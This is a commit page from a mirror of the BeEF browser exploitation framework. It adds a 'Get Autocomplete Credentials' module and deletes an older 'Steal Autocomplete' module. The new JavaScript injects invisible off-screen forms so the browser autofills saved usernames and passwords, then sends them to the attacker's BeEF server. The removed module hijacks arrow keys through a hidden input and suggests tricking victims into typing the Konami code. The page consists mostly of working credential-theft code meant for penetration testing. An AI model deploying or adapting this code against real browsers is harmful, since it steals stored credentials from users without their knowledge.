Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #1874 from bcoles/autocomplete_theft

Browse Source 
Replace autocomplete_theft with get_autocomplete_creds
This commit is contained in:
jcrew99
2020-04-24 10:06:52 +10:00
committed by GitHub
parent 165fc483e5 7a80e5f6ec
commit 1db08ad9f6
6 changed files with 107 additions and 140 deletions
Download Patch File Download Diff File Expand all files Collapse all files

74
modules/browser/hooked_domain/get_autocomplete_creds/command.js Normal file
View File

@@ -0,0 +1,74 @@
//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
get_form_data = function(form_name) {
var f = document.getElementById(form_name);
var results = '';
for(i=0; i<f.elements.length; i++) {
var k = f.elements[i].id;
var v = f.elements[i].value;
if (v != '') {
results += k + '=' + v + '&';
}
}
if (results == '') {
beef.debug("[Get Autocomplete Creds] Found no autocomplete credentials");
return;
}
beef.debug("[Get Autocomplete Creds] Found autocomplete data: '" + results + "'");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'results=' + results, beef.are.status_success());
}
create_form = function(input_name) {
var f = document.createElement("form");
f.setAttribute("id", "get_autocomplete_" + input_name + "_<%= @command_id %>");
f.setAttribute("style", "position:absolute;visibility:hidden;top:-1000px;left:-1000px;width:1px;height:1px;border:none;");
var u_input = document.createElement('input');
u_input.setAttribute("id", input_name);
u_input.setAttribute("name", input_name);
u_input.setAttribute("style", "position:absolute;visibility:hidden;top:-1000px;left:-1000px;width:1px;height:1px;border:none;");
u_input.setAttribute("type", "text");
f.appendChild(u_input);
var p_input = document.createElement('input');
p_input.setAttribute("id", "password");
p_input.setAttribute("name", "password");
p_input.setAttribute("style", "position:absolute;visibility:hidden;top:-1000px;left:-1000px;width:1px;height:1px;border:none;");
p_input.setAttribute("type", "password");
f.appendChild(p_input);
document.body.appendChild(f);
}
var inputs = [
'user',
'uname',
'username',
'user_name',
'login',
'loginname',
'login_name',
'email',
'emailaddress',
'email_address',
'session[username_or_email]',
'name'
];
beef.debug("[Get Autocomplete Creds] Creating forms ...");
for(i=0; i<inputs.length; i++) {
var input_name = inputs[i];
create_form(input_name);
setTimeout("get_form_data('get_autocomplete_" + input_name + "_<%= @command_id %>'); document.body.removeChild(document.getElementById('get_autocomplete_" + input_name + "_<%= @command_id %>'));", 2000);
}
});

16
modules/browser/hooked_domain/get_autocomplete_creds/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
get_autocomplete_creds:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Get Autocomplete Credentials"
description: "This module steals saved credentials for the hooked domain.<br/><br/>Tested on Firefox 68 and Chrome 49.<br/><br/>Note: On Firefox, the window must have focus."
authors: ["bcoles"]
target:
working: ["FF", "C"]
not_working: ["ALL"]

17
modules/browser/hooked_domain/get_autocomplete_creds/module.rb Normal file
View File

@@ -0,0 +1,17 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Get_autocomplete_creds < BeEF::Core::Command
def self.options
[]
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end

75
modules/social_engineering/autocomplete_theft/command.js
View File

@@ -1,75 +0,0 @@
//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
steal_autocomplete = function() {
var results = [];
// hijack keys and set focus
get_autocomplete = function (){
window.addEventListener("keydown",function(e){
switch(e.keyCode) {
case 37: // left
scrollTo(window.pageXOffset-20, window.pageYOffset);
break;
case 38: // up
scrollTo(window.pageXOffset, window.pageYOffset-20);
break;
case 39: // right
scrollTo(window.pageXOffset+20, window.pageYOffset);
break;
case 40: // down
scrollTo(window.pageXOffset, window.pageYOffset+20);
break;
default:break;
}
},false);
document.getElementById("placeholder").focus();
}
inArray = function(el, arr){
for (var i = 0;i < arr.length;i++)
if (el===arr[i])
return true;
return false;
}
steal = function(n,v) {
var val = JSON.stringify({'input':n,'value':v});
if (v != "" && !inArray(val,results)){
results.push(val);
beef.debug("[Module - autocomplete_theft] Found saved string: '" + val + "'");
beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
}
}
tt = function(ev) {
if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
}
// create hidden input element
input = document.createElement('input');
input.setAttribute("id", "placeholder");
input.setAttribute("name", "<%= @input_name %>");
input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
input.setAttribute("type", "text");
input.onkeyup = function(event) { tt(event); }
input.onkeydown = function(event) { tt(event); }
input.onblur = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
document.body.appendChild(input);
// steal autocomplete
get_autocomplete();
}
setTimeout("steal_autocomplete();", 100);
});

16
modules/social_engineering/autocomplete_theft/config.yaml
View File

@@ -1,16 +0,0 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
steal_autocomplete:
enable: true
category: "Social Engineering"
name: "Steal Autocomplete"
description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.<br/>Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)."
authors: ["Stefano Di Paola", "bcoles"]
target:
working: ["FF"]
not_working: ["ALL"]

49
modules/social_engineering/autocomplete_theft/module.rb
View File

@@ -1,49 +0,0 @@
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# Based on the PoC by Stefano Di Paola
# Ported to BeEF by bcoles
# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html
################################################################################
class Steal_autocomplete < BeEF::Core::Command
def self.options
return [
{ 'name' => 'input_name',
'type' => 'combobox',
'ui_label' => 'Input Field Name',
'store_type' => 'arraystore',
'store_fields' => ['element_name'],
'store_data' => [
['login'],
['email'],
['Email'],
['session[username_or_email]'],
['q'],
['search'],
['name'],
['company'],
['city'],
['state'],
['country'],
],
'emptyText' => 'Select an input field name to steal autocomplete values',
'valueField' => 'element_name',
'displayField' => 'element_name',
'mode' => 'local',
'autoWidth' => true
}
]
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end